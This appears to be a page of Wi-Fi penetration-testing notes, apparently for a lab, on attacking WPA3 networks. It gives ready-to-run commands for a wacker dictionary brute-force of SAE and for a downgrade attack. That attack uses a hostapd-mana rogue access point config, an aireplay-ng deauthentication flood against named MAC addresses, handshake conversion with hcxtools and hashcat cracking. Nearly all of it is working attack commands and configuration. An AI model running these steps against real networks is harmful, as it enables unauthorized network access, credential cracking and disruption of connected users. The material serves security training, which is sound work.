WPA3

Bruteforcing WPA3

In WPA3 networks it is still possible to brute force until the password is found, to do this we can use “wacker”.

GitHub - blunderbuss-wctf/wacker: A WPA3 dictionary crackerGitHub

Tab 1: Target Discovery

Identify the WPA3 network details.

airodump-ng --band abg wlan8mon

Target SSID: SweetB-WPA3
BSSID: 02:00:00:00:02:00 (Note: Use the specific MAC shown in your scan)
Channel: 36
Encryption: Look for WPA3 CCMP SAE.

Tab 2: The Wacker Attack

Wacker is a specialized tool that automates the SAE authentication loop to test passwords.

Navigate to Tool: cd /home/rogue1/opt/wacker/
Command:

./wacker.py --wordlist /home/rogue1/opt/rockyouwifi.txt --interface wlan5 --ssid SweetB-WPA3 --bssid 02:00:00:00:02:00 --freq 5180

Flag Breakdown:
- --wordlist: Path to your dictionary file.
- --interface: Use a managed interface (e.g., wlan1), NOT a monitor mode interface, as Wacker interacts with the wpa_supplicant stack.
- --freq: The frequency in MHz (e.g., Channel 36 = 5180).
Success: When the password is found, it will output: Found the password: 'password1'.

WPS3 Downgrate attack

If a network with WPA3 SAE has a client configured for WPA2/WPA3 we can perform a downgrade against the client forcing it to connect to our RogueAP with WPA2 obtaining the handshake to crack it later, as in the case of wifi-offices. In this case we can see that the AP uses SAE and PSK, so maybe the clients accept PSK too. We can get this information in the airodump-ng “.csv” file.

hostapd-sae.conf

interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=wifi-IT
mana_wpaout=hostapd-management.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

This is a Hostapd configuration file used to set up a fake access point (AP) for penetration testing purposes. Here’s a breakdown of each line:

interface=wlan1 → Specifies that wlan1 is the wireless network interface to be used for hosting the fake AP.
driver=nl80211 → Uses the nl80211 driver, which is common for modern Linux-based wireless devices.
hw_mode=g → Sets the 802.11g standard, which operates on the 2.4 GHz band and supports speeds up to 54 Mbps.
channel=11 → Specifies Channel 11 (2462 MHz) for the AP.
ssid=wifi-IT → This is the SSID (Wi-Fi network name) that the AP will broadcast.
mana_wpaout=hostapd-management.hccapx → Captures WPA handshakes and saves them in the HCCAPX format, which is used for offline password cracking with Hashcat.
wpa=2 → Configures WPA2 encryption (stronger than WPA1).
wpa_key_mgmt=WPA-PSK → Uses Pre-Shared Key (PSK) authentication.
wpa_pairwise=TKIP CCMP → Supports both TKIP (legacy) and CCMP (AES-based, stronger encryption).
wpa_passphrase=12345678 → Sets the Wi-Fi password to 12345678.

What This Configuration Does

✅ Creates a fake Wi-Fi network named "wifi-IT" on channel 11 (2.462 GHz). ✅ Uses WPA2-PSK encryption with the password "12345678". ✅ Captures WPA handshakes in HCCAPX format for cracking later. ✅ Uses wlan1 interface with nl80211 driver.

hostapd-mana hostapd-sae.conf

We can check if the AP has MFP(802.11w) with Wireshark:

In this case 802.11w is disabled so we can deauth:

# In this case 802.11w is disabled so we can deauth
iwconfig wlan0mon channel 11
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25  -c 10:F9:6F:AC:53:52

And you will be able to capture the handshake.

Save the hccapx to pcap

hcxhash2cap --hccapx=hostapd-management.hccapx -c aux-management.pcap

Export the 22000 hash mode from the pcap

hcxpcapngtool aux-management.pcap -o hash-management.22000

Crack outside the VM or with a new version of hashcat.

sudo hashcat -a 0 -m 22000 hash-management.22000 ~/10-million-password-list-top-100000.txt --force

PreviousWPS NextEnterprise WIFI Hacking MGT/ EAP-PEAP

Last updated 4 hours ago

hashtagBruteforcing WPA3

hashtagTab 1: Target Discovery

hashtagTab 2: The Wacker Attack

hashtagWPS3 Downgrate attack

hashtagWhat This Configuration Does

Bruteforcing WPA3

Tab 1: Target Discovery

Tab 2: The Wacker Attack

WPS3 Downgrate attack

What This Configuration Does